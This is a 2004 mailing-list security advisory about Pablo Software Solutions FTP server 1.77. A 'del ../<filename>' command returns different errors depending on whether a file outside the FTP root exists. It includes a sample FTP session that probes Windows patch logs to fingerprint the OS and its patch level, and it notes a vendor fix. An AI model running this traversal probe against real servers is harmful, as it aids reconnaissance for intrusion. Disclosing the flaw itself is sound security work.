Date: Sun, 18 Jan 2004 21:19:18 +0100
From: scrap <[email protected]>
To: [email protected], [email protected]Subject: Pablo Sofware Solutions FTP server can detect if a file exists outside the FTP root directory
Pablo Sofware Solutions FTP server can detect if a file exists outside the =
=46TP=20
root directory=20
=2EoO Overview Oo.
Pablo Software Solutions FTP server version 1.77 can detect if a file exist=
s=20
outside the FTP root directory.
Discovered on 2004, January, 11th
Vendor: Pablo Software Solutions (http://www.pablovandermeer.nl)
Pablo's FTP Server is a multi threaded FTP server for Windows 98/NT/XP. It=
=20
comes with an easy to use interface and can be accessed from the system tra=
y.=20
The server handles all basic FTP commands and offers easy user account=20
management and support for virtual directories. This FTP server can detect =
if=20
a file exists outside the FTP root directory.
=2EoO Details Oo.
The vulnerability can be done using the MS-DOS ftp client. When you are log=
ged=20
on the server, you can send a del \..\<filename> supposed your root directo=
ry=20
is c:\ftp_server
If <filename> exists, the FTP server answers "550 Permission denied." If=20
<filename> doesn't exist, the FTP server answers "550 File not found."
In any case, the file is never deleted. That is normal.
=2EoO Exploit Oo.
Checking if a file exists on a remote system can be usefull to :
* Fingerprint the OS. OSes don't have the same installed files by defau=
lt.=20
By this way, you can know if the remote system is Windows NT, or 2000 or=20
XP...
* Know the vulnerabilities of a system. By testing if=20
"../WINNT/Q329115.log" exists, you can know if the remote system have this=
=20
patch installed
* Maybe some other interesting things...
Here is an example of the vulnerability :
C:\>ftp 127.0.0.1
Connect=E9 =E0 127.0.0.1.
220 Welcome to Pablo's FTP Server
Utilisateur (127.0.0.1:(none)) : test
331 Password required for test
Mot de passe :
230 User successfully logged in.
ftp> dir
200 Port command successful.
150 Opening ASCII mode data connection for directory list.
=2Drwx------ 1 user group 0 Jan 11 18:18 ceci est le repertoire test.txt
226 Transfer complete
ftp : 85 octets re=E7us dans 0,00Secondes 84000,00Ko/sec.
ftp> dir ..
200 Port command successful.
550 "..": Permission denied. That is OK.
ftp> cd ..
550 "..": Permission denied. That is OK.
ftp> del ../WINNT/Q328310.log
550 Permission denied. File exists !
ftp> del ../WINNT/Q329115.log
550 File not found. File does not exists !
ftp> quit
=2EoO Solution Oo.
The vendor has been informed and has solved the problem.
Download Pablo's FTP server 1.8 at=20
http://www.pablovandermeer.nl/ftp_server.html
=2EoO Discovered by Oo.
Arnaud Jacques aka scrap
[email protected]http://www.securiteinfo.com
